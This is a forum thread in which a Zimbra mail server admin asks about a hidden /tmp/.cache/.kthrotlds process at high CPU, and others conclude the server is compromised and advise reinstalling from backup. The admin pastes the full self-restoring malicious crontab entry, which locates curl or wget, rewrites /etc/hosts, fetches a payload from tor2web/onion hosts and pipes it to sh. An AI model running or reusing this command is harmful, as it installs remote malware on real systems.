Zimbra /tmp/.cache/.kthrotlds 400% CPU usage

nagendra

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
13921 zimbra    20   0  354748  11156    720 S **299**.6  0.1   4:13.99 /tmp/.cache/.kthrotlds

any idea where excatly this is running i tried delete tmp folder
still crontab entry keeps getting created automatically
where excatly its excuting ..please help

scottalanmiller

@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

/tmp/.cache/.kthrotlds

in theory this is the name of the process.

scottalanmiller

Is the system fully updated?

nagendra

yes its update...i had same issue last time i found some scripts in tmp
i just modified inside that and it stopped for somtime..now again its started..

nagendra

@scottalanmiller yes scott

scottalanmiller

This appears to be an exploit. Most likely your system has been compromised.

scottalanmiller

https://forums.zimbra.org/viewtopic.php?t=65932&start=120

nagendra

ok shud i re-install... i have a backup

scottalanmiller

@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

ok shud i re-install... i have a backup

Maybe.

There is one line in crontab and even when deleted, it comes back?

nagendra

yes this is the entry...

/11 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to [email protected]" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.|timesync.su|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
~
~

scottalanmiller

Yeah, definitely compromised. So the biggest issue is... finding the compromise. It could be anywhere.

nagendra

@scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

nding the compromise. It could be anywhere.

yah better install free zimbra restore the backup...

scottalanmiller

@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

@scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

nding the compromise. It could be anywhere.

yah better install free zimbra restore the backup...

Yeha, I think so.

dbeato

@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

@scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

nding the compromise. It could be anywhere.

yah better install free zimbra restore the backup...

What is your OS version?